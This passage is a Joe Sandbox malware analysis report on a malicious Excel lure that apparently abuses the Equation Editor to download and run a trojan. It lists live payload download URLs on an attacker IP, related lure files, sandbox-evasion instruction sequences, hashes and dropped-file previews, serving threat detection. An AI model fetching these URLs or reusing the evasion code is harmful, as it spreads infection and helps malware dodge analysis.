Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Source: MILKA CHOCO COW BISCUITS AND CADBURY OFFERS,TWIX,SNICKERS,BOUNTY,GALAXY.xlsx

Stream path 'EncryptedPackage' entropy: 7.99876914636 (max. 8.0)

Malware Analysis System Evasion:

Contains functionality to detect hardware virtualization (CPUID execution measurement)

Show sources

Source: C:\Users\Public\vbc.exe	Code function: 6_2_002E28A0	6_2_002E28A0
Source: C:\Users\Public\vbc.exe	Code function: 6_2_002E7D3E	6_2_002E7D3E
Source: C:\Users\Public\vbc.exe	Code function: 6_2_002E7503	6_2_002E7503
Source: C:\Users\Public\vbc.exe	Code function: 6_2_002E2379	6_2_002E2379
Source: C:\Users\Public\vbc.exe	Code function: 6_2_002E27A4	6_2_002E27A4

Detected RDTSC dummy instruction sequence (likely for instruction hammering)

Show sources

Source: C:\Users\Public\vbc.exe

RDTSC instruction interceptor: First address: 00000000002E8CAB second address: 00000000002E8CAB instructions: 0x00000000 rdtsc 0x00000002 mov eax, 00000001h 0x00000007 cpuid 0x00000009 popad 0x0000000a mov dword ptr [ebp+00000253h], edx 0x00000010 mov edx, 83A23224h 0x00000015 cmp bh, ch 0x00000017 test ah, dh 0x00000019 xor edx, B23AA633h 0x0000001f xor edx, 5BA5550Bh 0x00000025 test ch, 00000068h 0x00000028 sub edx, 6A3DC11Ch 0x0000002e test cx, dx 0x00000031 cmp dword ptr [ebp+00000253h], edx 0x00000037 mov edx, dword ptr [ebp+00000253h] 0x0000003d jne 00007F28A87C6F98h 0x0000003f dec ebx 0x00000040 xor edx, edx 0x00000042 mov eax, ebx 0x00000044 test si, 634Bh 0x00000049 mov ecx, D06366DFh 0x0000004e test bx, cx 0x00000051 sub ecx, D6A7F971h 0x00000057 cmp ecx, ecx 0x00000059 xor ecx, 335F4321h 0x0000005f sub ecx, CAE42E4Bh 0x00000065 test ebx, edx 0x00000067 div ecx 0x00000069 pushad 0x0000006a rdtsc

Tries to detect virtualization through RDTSC time measurements

Show sources

Source: C:\Users\Public\vbc.exe	RDTSC instruction interceptor: First address: 00000000002E8CAB second address: 00000000002E8CAB instructions: 0x00000000 rdtsc 0x00000002 mov eax, 00000001h 0x00000007 cpuid 0x00000009 popad 0x0000000a mov dword ptr [ebp+00000253h], edx 0x00000010 mov edx, 83A23224h 0x00000015 cmp bh, ch 0x00000017 test ah, dh 0x00000019 xor edx, B23AA633h 0x0000001f xor edx, 5BA5550Bh 0x00000025 test ch, 00000068h 0x00000028 sub edx, 6A3DC11Ch 0x0000002e test cx, dx 0x00000031 cmp dword ptr [ebp+00000253h], edx 0x00000037 mov edx, dword ptr [ebp+00000253h] 0x0000003d jne 00007F28A87C6F98h 0x0000003f dec ebx 0x00000040 xor edx, edx 0x00000042 mov eax, ebx 0x00000044 test si, 634Bh 0x00000049 mov ecx, D06366DFh 0x0000004e test bx, cx 0x00000051 sub ecx, D6A7F971h 0x00000057 cmp ecx, ecx 0x00000059 xor ecx, 335F4321h 0x0000005f sub ecx, CAE42E4Bh 0x00000065 test ebx, edx 0x00000067 div ecx 0x00000069 pushad 0x0000006a rdtsc
Source: C:\Users\Public\vbc.exe	RDTSC instruction interceptor: First address: 00000000002E750B second address: 00000000002E752A instructions: 0x00000000 rdtsc 0x00000002 mov eax, 4E5E24E1h 0x00000007 xor eax, 256A0EB4h 0x0000000c xor eax, 6B41C15Ch 0x00000011 xor eax, 0075EB08h 0x00000016 cpuid 0x00000018 popad 0x00000019 pushad 0x0000001a mov ecx, 000000F8h 0x0000001f rdtsc

Source: C:\Users\Public\vbc.exe

Code function: 6_2_002E542E rdtsc

6_2_002E542E

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 824

Thread sleep time: -300000s >= -30000s

Jump to behavior

Source: C:\Users\Public\vbc.exe

Code function: 6_2_002E542E rdtsc

6_2_002E542E

Source: C:\Users\Public\vbc.exe	Code function: 6_2_002E504C mov eax, dword ptr fs:[00000030h]	6_2_002E504C
Source: C:\Users\Public\vbc.exe	Code function: 6_2_002E7D3E mov eax, dword ptr fs:[00000030h]	6_2_002E7D3E
Source: C:\Users\Public\vbc.exe	Code function: 6_2_002E7106 mov eax, dword ptr fs:[00000030h]	6_2_002E7106
Source: C:\Users\Public\vbc.exe	Code function: 6_2_002E7D06 mov eax, dword ptr fs:[00000030h]	6_2_002E7D06
Source: C:\Users\Public\vbc.exe	Code function: 6_2_002E322C mov eax, dword ptr fs:[00000030h]	6_2_002E322C
Source: C:\Users\Public\vbc.exe	Code function: 6_2_002E3259 mov eax, dword ptr fs:[00000030h]	6_2_002E3259
Source: C:\Users\Public\vbc.exe	Code function: 6_2_002E2EF7 mov eax, dword ptr fs:[00000030h]	6_2_002E2EF7
Source: C:\Users\Public\vbc.exe	Code function: 6_2_002E6B69 mov eax, dword ptr fs:[00000030h]	6_2_002E6B69
Source: C:\Users\Public\vbc.exe	Code function: 6_2_002E27A4 mov eax, dword ptr fs:[00000030h]	6_2_002E27A4

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'

Jump to behavior

Source: vbc.exe, 00000006.00000002.2388941517.0000000000980000.00000002.00000001.sdmp	Binary or memory string: Program Manager
Source: vbc.exe, 00000006.00000002.2388941517.0000000000980000.00000002.00000001.sdmp	Binary or memory string: Shell_TrayWnd
Source: vbc.exe, 00000006.00000002.2388941517.0000000000980000.00000002.00000001.sdmp	Binary or memory string: !Progman

Source: C:\Users\Public\vbc.exe

Code function: 6_2_002E7337 cpuid

6_2_002E7337

Source: C:\Users\Public\vbc.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Exploitation for Client Execution12	Path Interception	Process Injection12	Masquerading111	OS Credential Dumping	Security Software Discovery41	Remote Services	Archive Collected Data1	Exfiltration Over Other Network Medium	Encrypted Channel1	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	Virtualization/Sandbox Evasion1	LSASS Memory	Virtualization/Sandbox Evasion1	Remote Desktop Protocol	Data from Removable Media	Exfiltration Over Bluetooth	Ingress Tool Transfer12	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	Process Injection12	Security Account Manager	Process Discovery1	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Non-Application Layer Protocol1	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Obfuscated Files or Information11	NTDS	Remote System Discovery1	Distributed Component Object Model	Input Capture	Scheduled Transfer	Application Layer Protocol121	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Software Packing	LSA Secrets	File and Directory Discovery1	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Steganography	Cached Domain Credentials	System Information Discovery313	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

No Antivirus matches

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\.svchost[1].exe	43%	ReversingLabs	Win32.Trojan.Vebzenpak
C:\Users\Public\vbc.exe	43%	ReversingLabs	Win32.Trojan.Vebzenpak

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

Source	Detection	Scanner	Label	Link
https://kinmirai.org/wp-content/bin_inUIdCgQk163.bin	0%	Avira URL Cloud	safe
http://180.214.239.39/process/.svchost.exe	100%	Avira URL Cloud	malware

Domains and IPs

Contacted Domains

No contacted domains info

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://kinmirai.org/wp-content/bin_inUIdCgQk163.bin	true	Avira URL Cloud: safe	unknown
http://180.214.239.39/process/.svchost.exe	true	Avira URL Cloud: malware	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://www.day.com/dam/1.0	F70A7842.emf.0.dr	false		high

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
180.214.239.39	unknown	Viet Nam		135905	VNPT-AS-VNVIETNAMPOSTSANDTELECOMMUNICATIONSGROUPVN	true

General Information

Joe Sandbox Version:	33.0.0 White Diamond
Analysis ID:	452495
Start date:	22.07.2021
Start time:	14:01:33
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 7m 26s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	MILKA CHOCO COW BISCUITS AND CADBURY OFFERS,TWIX,SNICKERS,BOUNTY,GALAXY.xlsx
Cookbook file name:	defaultwindowsofficecookbook.jbs
Analysis system description:	Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Number of analysed new started processes analysed:	5
Number of new started drivers analysed:	2
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.troj.expl.evad.winXLSX@4/13@0/1
EGA Information:	Failed
HDC Information:	Failed
HCA Information:	Successful, ratio: 53% Number of executed functions: 8 Number of non-executed functions: 71
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .xlsx Found Word or Excel or PowerPoint or XPS Viewer Attach to Office via COM Scroll down Close Viewer
Warnings:	Show All Exclude process from analysis (whitelisted): dllhost.exe, vga.dll Report size getting too big, too many NtCreateFile calls found. Report size getting too big, too many NtQueryAttributesFile calls found. VT rate limit hit for: /opt/package/joesandbox/database/analysis/452495/sample/MILKA CHOCO COW BISCUITS AND CADBURY OFFERS,TWIX,SNICKERS,BOUNTY,GALAXY.xlsx

Simulations

Behavior and APIs

Time	Type	Description
14:03:18	API Interceptor	69x Sleep call for process: EQNEDT32.EXE modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
180.214.239.39	new order requirment-21 July.xlsx	Get hash	malicious	Browse	180.214.239.39/service/.svchost.exe
	Booking Confirmation.xlsx	Get hash	malicious	Browse	180.214.239.39/network/.svchost.exe
	CMA-CGM BOOKING CONFIRMATION.xlsx	Get hash	malicious	Browse	180.214.239.39/disk/.svchost.exe
	MTIR21487610_0062180102_20210714081247.PDF.xlsx	Get hash	malicious	Browse	180.214.239.39/user/.svchost.exe
	MTIR21487610_0062180102_20210714081247.PDF.xlsx	Get hash	malicious	Browse	180.214.239.39/cpu/.svchost.exe
	Booking Confirmation.xlsx	Get hash	malicious	Browse	180.214.239.39/port/.svchost.exe
	6306093940.xlsx	Get hash	malicious	Browse	180.214.239.39/ssh/.svchost.exe
	6306093940.xlsx	Get hash	malicious	Browse	180.214.239.39/mssn/.svchost.exe

Domains

No context

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
VNPT-AS-VNVIETNAMPOSTSANDTELECOMMUNICATIONSGROUPVN	DHL 07988 AWB 202107988.xlsx	Get hash	malicious	Browse	180.214.236.151
	new order requirment-21 July.xlsx	Get hash	malicious	Browse	180.214.239.39
	SKM_C258201001130020005057R1RE.jar	Get hash	malicious	Browse	103.133.104.124
	Booking Confirmation.xlsx	Get hash	malicious	Browse	180.214.239.39
	RFQ- 7075-T6 ( PLASTIC MOULD POLY INDUSTRIES 02993 INQUIRE).xlsx	Get hash	malicious	Browse	180.214.236.151
	shipping document.xlsx	Get hash	malicious	Browse	103.140.250.43
	DHL 07988 AWB 202107988.xlsx	Get hash	malicious	Browse	180.214.236.151
	CMA-CGM BOOKING CONFIRMATION.xlsx	Get hash	malicious	Browse	180.214.239.39
	SO-19844 EIDCO.ppam	Get hash	malicious	Browse	103.141.137.204
	qHuGyYm6MV.exe	Get hash	malicious	Browse	103.133.104.146
	INV 2429.xlsx	Get hash	malicious	Browse	180.214.236.151
	PROFORMA_INVOICE.xlsx	Get hash	malicious	Browse	103.140.250.43
	MTIR21487610_0062180102_20210714081247.PDF.xlsx	Get hash	malicious	Browse	180.214.239.39
	kung.xlsx	Get hash	malicious	Browse	103.140.250.43
	kung.xlsx	Get hash	malicious	Browse	103.140.250.43
	SYHPpy5x6D.exe	Get hash	malicious	Browse	103.133.104.146
	Swift.xlsx	Get hash	malicious	Browse	103.133.104.146
	S&P-RFQ #2004668.xlsx	Get hash	malicious	Browse	180.214.236.151
	NEW ORDER.xlsx	Get hash	malicious	Browse	103.140.250.43
	MTIR21487610_0062180102_20210714081247.PDF.xlsx	Get hash	malicious	Browse	180.214.239.39

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\.svchost[1].exe Download File
Process:	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	downloaded
Size (bytes):	246888
Entropy (8bit):	4.648392883751036
Encrypted:	false
SSDEEP:	1536:HrnnnnnnnnnnnnnnnrKDnnnnnnnnnnnnnnnCnnnnnnnnnnnnnnXnnnnnnnnnnnnE:H6LVbA8nT1vnv9dnj6czcW
MD5:	C937FC9ED4325E6AB24D49A3175F3A5C
SHA1:	00439295920E78ECAC31D1DBF7EB67118D76299A
SHA-256:	D54CAFC1CA36D0DDD134F53D033EBBAAA490721D62D4168106A9B6C7CFA200BA
SHA-512:	FF13A5D3BFD503E0F11C9D974A4AC88F965EEC14CBF07723AC9ED425222AAA7C5871A6438CD7491FBD694424EBE4C8675DC076E81564204583336A2940E9A9D0
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 43%
Reputation:	low
IE Cache URL:	http://180.214.239.39/process/.svchost.exe
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........y....................................Rich............PE..L.....\S.................0...p......0........@....@.........................................................................t0..(....P...T..........X.......................................................(... ....................................text....$.......0.................. ..`.data........@.......@..............@....rsrc....T...P...`...P..............@..@...I............MSVBVM60.DLL....................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\15AA81A0.jpeg Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPI), density 150x150, segment length 16, baseline, precision 8, 1275x1650, frames 3
Category:	dropped
Size (bytes):	85020
Entropy (8bit):	7.2472785111025875
Encrypted:	false
SSDEEP:	768:RgnqDYqspFlysF6bCd+ksds0cdAgfpS56wmdhcsp0Pxm00JkxuacpxoOlwEF3hVL:RUqQGsF6OdxW6JmPncpxoOthOip
MD5:	738BDB90A9D8929A5FB2D06775F3336F
SHA1:	6A92C54218BFBEF83371E825D6B68D4F896C0DCE
SHA-256:	8A2DB44BA9111358AFE9D111DBB4FC726BA006BFA3943C1EEBDA5A13F87DDAAB
SHA-512:	48FB23938E05198A2FE136F5E337A5E5C2D05097AE82AB943EE16BEB23348A81DA55AA030CB4ABCC6129F6EED8EFC176FECF0BEF4EC4EE6C342FC76CCDA4E8D6
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	......JFIF.............C....................................................................C.......................................................................r...."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?.....(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\302029DA.png Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	PNG image data, 458 x 211, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	11303
Entropy (8bit):	7.909402464702408
Encrypted:	false
SSDEEP:	192:O64BSHRaEbPRI3iLtF0bLLbEXavJkkTx5QpBAenGIC1bOgjBS6UUijBswpJuaUSt:ODy31IAj0bL/EKvJkVFgFg6UUijOmJJN
MD5:	9513E5EF8DDC8B0D9C23C4DFD4AEECA2
SHA1:	E7FC283A9529AA61F612EC568F836295F943C8EC
SHA-256:	88A52F8A0BDE5931DB11729D197431148EE9223B2625D8016AEF0B1A510EFF4C
SHA-512:	81D1FE0F43FE334FFF857062BAD1DFAE213EED860D5B2DD19D1D6875ACDF3FC6AB82A43E46ECB54772D31B713F07A443C54030C4856FC4842B4C31269F61346D
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	.PNG........IHDR..............P.l....sRGB.........gAMA......a.....pHYs...t...t..f.x..+.IDATx...\|.e............{......z.Y8..DiE.46.@.$$....+!.T.H/..M6..RH.l.R.!AC...>3;3;..4..~...>3.<.<..7.<3..555........c...xo.Z.X.J...Lhv.u.q..C..D......-...#n...!.W..#...x.m..&.S........cG.... s..H.=......,...(((HJJR.s..05J...2m.....=..R..Gs....G.3.z..."............(..1$..)..[..c&t..ZHv..5....3#..~8....Y...............e2...?.0.t.R}ZI..`.&.......rO..U.mK..N.8..C...[..\....G.^y.U.....N.....eff.....A....Z.b.YU....M.j.vC+\.gu..0v..5...fo.....'......^w..y....O.RSS....?.."L.+c.J....ku$._...Av...Z...*Y.0.z..zMsrT.:.<.q.....a.......O.....$2.=\|.0.0..A.v..j....h..P.Nv......,.0....z=...I@8m.h.:]..B.q.C.......6...8qB......G\.."L.o..[)..Z.XuJ.pE..Q.u.:..$[K..2.....zM=`.p.Q@.o.LA../.%....EFsk:z...9.z......>z..H,.{{{...C....n..X.b....K.:..2,...C....;.4....f1,G.....p\|f6.^._.c..'''Qll..........W.[..s..q+e.:.\|..(....aY..yX....}...n.u..8d...L...:B."zuxz..^..m;p..(&&....

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\302CBFD.jpeg Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	[TIFF image data, big-endian, direntries=4], baseline, precision 8, 654x513, frames 3
Category:	dropped
Size (bytes):	62140
Entropy (8bit):	7.529847875703774
Encrypted:	false
SSDEEP:	1536:S30U+TLdCuTO/G6VepVUxKHu9CongJvJsg:vCTbVKVzHu9ConWvJF
MD5:	722C1BE1697CFCEAE7BDEFB463265578
SHA1:	7D300A2BAB951B475477FAA308E4160C67AD93A9
SHA-256:	2EE4908690748F50B261A796E6932FBCA10A79D83C316A9CEE92726CA4453DAE
SHA-512:	2F38E0581397025674FA40B20E73B32D26F43851BE9A8DFA0B1655795CDC476A5171249D1D8D383693775ED9F132FA6BB56D92A8949191738AF05DA053C4E561
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	......JFIF.....`.`......Exif..MM.*.......;.........J.i.........R.......................>................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\4F3E78AE.png Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	PNG image data, 458 x 211, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	11303
Entropy (8bit):	7.909402464702408
Encrypted:	false
SSDEEP:	192:O64BSHRaEbPRI3iLtF0bLLbEXavJkkTx5QpBAenGIC1bOgjBS6UUijBswpJuaUSt:ODy31IAj0bL/EKvJkVFgFg6UUijOmJJN
MD5:	9513E5EF8DDC8B0D9C23C4DFD4AEECA2
SHA1:	E7FC283A9529AA61F612EC568F836295F943C8EC
SHA-256:	88A52F8A0BDE5931DB11729D197431148EE9223B2625D8016AEF0B1A510EFF4C
SHA-512:	81D1FE0F43FE334FFF857062BAD1DFAE213EED860D5B2DD19D1D6875ACDF3FC6AB82A43E46ECB54772D31B713F07A443C54030C4856FC4842B4C31269F61346D
Malicious:	false
Preview:	.PNG........IHDR..............P.l....sRGB.........gAMA......a.....pHYs...t...t..f.x..+.IDATx...\|.e............{......z.Y8..DiE.46.@.$$....+!.T.H/..M6..RH.l.R.!AC...>3;3;..4..~...>3.<.<..7.<3..555........c...xo.Z.X.J...Lhv.u.q..C..D......-...#n...!.W..#...x.m..&.S........cG.... s..H.=......,...(((HJJR.s..05J...2m.....=..R..Gs....G.3.z..."............(..1$..)..[..c&t..ZHv..5....3#..~8....Y...............e2...?.0.t.R}ZI..`.&.......rO..U.mK..N.8..C...[..\....G.^y.U.....N.....eff.....A....Z.b.YU....M.j.vC+\.gu..0v..5...fo.....'......^w..y....O.RSS....?.."L.+c.J....ku$._...Av...Z...*Y.0.z..zMsrT.:.<.q.....a.......O.....$2.=\|.0.0..A.v..j....h..P.Nv......,.0....z=...I@8m.h.:]..B.q.C.......6...8qB......G\.."L.o..[)..Z.XuJ.pE..Q.u.:..$[K..2.....zM=`.p.Q@.o.LA../.%....EFsk:z...9.z......>z..H,.{{{...C....n..X.b....K.:..2,...C....;.4....f1,G.....p\|f6.^._.c..'''Qll..........W.[..s..q+e.:.\|..(....aY..yX....}...n.u..8d...L...:B."zuxz..^..m;p..(&&....

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\5898FC13.png Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	PNG image data, 816 x 552, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	94963
Entropy (8bit):	7.9700481154985985
Encrypted:	false
SSDEEP:	1536:U75cCbvD0PYFuxgYx30CS9ITdjq/DnjKqLqA/cx8zJjCKouoRwWH/EXXXXXXXXXB:kAPVZZ+oq/3TLPcx8zJjCXaWfEXXXXXB
MD5:	17EC925977BED2836071429D7B476809
SHA1:	7A176027FFD13AA407EF29EA42C8DDF7F0CC5D5C
SHA-256:	83905385F5DF8E961CE87C8C4F5E2F470CBA3198A6C1ABB0258218D932DDF2E9
SHA-512:	3E63730BC8FFEAD4A57854FEA1F1F137F52683734B68003480030DA77379EF6347115840280B63B75D61569B2F4F307B832241E3CEC23AD27A771F7B16D199A2
Malicious:	false
Preview:	.PNG........IHDR...0...(.....9.......sRGB.........gAMA......a.....pHYs..........o.d....IDATx^....e.z...b.$..P ..^.Jd..8.........c..c..mF.&......F...[....Zk...>.g....{...U.T.S.'.O......eS`S`S`S`S`S`S`S..Q.{....._...?...g7.6.6.6.6.6.6.6......$......................!..c.?.).).).).).)..).=...+.....................}................x.....O.M.M.M.M.M.M.M..M...>....o.l.l.l.l.l..z.l@...&.................@.....C................+...d.x.w.7.6.6.6.6.6.^..6 {..[.).).).).).)..)...+....M.M.M.M.M.M..A...^.8.Vl.l.l.l.l.l..b.l@....w}S`S`S`S`S`S.eP`...1........................]............x....e..n............+...d.x.w.7.6.6.6.6.6.^..6 {..[.).).).).).)..)...+....M.M.M.M.M.M..A...^.8.Vl.l.l.l.l.l..b.l@....w}S`S`S`S`S`S.eP`...1..................?.....b..o.l.l.l.l.l.l.\|`.l@...`.~S`S`S`S`S`S`S`..=.6.6.6.6.6.6.6.>0.6 ....?.).).).).).).).......................}..................l.M.M.M.M.M.M.M..L...>....o.l.l.l.l.l.l.l@.....................d.x...7.6.6.6.6.6.6.6 .s`S`S`S`S`S`S`S..S`...<...

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\75E4675B.emf Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	Windows Enhanced Metafile (EMF) image data version 0x10000
Category:	dropped
Size (bytes):	7608
Entropy (8bit):	5.077529457823583
Encrypted:	false
SSDEEP:	96:+Si3EL6BGj/MQU8DbwiMOtWmVz76F2MqdTfOYL/xRp7uGkmrI:50UjU+H3tWa6WdTfOYLpR8d
MD5:	877A9BFE4326CA64857F36D83F6A133A
SHA1:	840AE4701E7688FBA69DD6EF00D1BA411EFD4279
SHA-256:	C3F4CE75A96355CAFA0CED3BFD3281F5B209B1C66F66927DB647364F62BB2F59
SHA-512:	6A02EB2BA6CC3972FF7A482D4E0EC88C0DA36BA7899AFD0BBDDFA089CC23E6AA0ED5B0304A52B674A93E3A3EFC09C3AEBCCED8506AE3D88EDC7E1E968B0DFA8F
Malicious:	false
Preview:	....l...,...........<................... EMF................................8...X....................?..................................C...R...p...................................S.e.g.o.e. .U.I.....................................................6.).X...0...d.....................u.`.u....p....\.....u.......u...u....p......u..6Pv...p....`..p....$y.v..............u....v....$.....a.d.......D.u..^.p.....^.p.........(......-.....u..<.v................<.>v.Z.v....X..o...............................vdv......%...................................r...................'...........(...(..................?...........?................l...4...........(...(...(...(...(..... .............................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\B1EE5521.jpeg Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	[TIFF image data, big-endian, direntries=4], baseline, precision 8, 654x513, frames 3
Category:	dropped
Size (bytes):	62140
Entropy (8bit):	7.529847875703774
Encrypted:	false
SSDEEP:	1536:S30U+TLdCuTO/G6VepVUxKHu9CongJvJsg:vCTbVKVzHu9ConWvJF
MD5:	722C1BE1697CFCEAE7BDEFB463265578
SHA1:	7D300A2BAB951B475477FAA308E4160C67AD93A9
SHA-256:	2EE4908690748F50B261A796E6932FBCA10A79D83C316A9CEE92726CA4453DAE
SHA-512:	2F38E0581397025674FA40B20E73B32D26F43851BE9A8DFA0B1655795CDC476A5171249D1D8D383693775ED9F132FA6BB56D92A8949191738AF05DA053C4E561
Malicious:	false
Preview:	......JFIF.....`.`......Exif..MM.*.......;.........J.i.........R.......................>................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

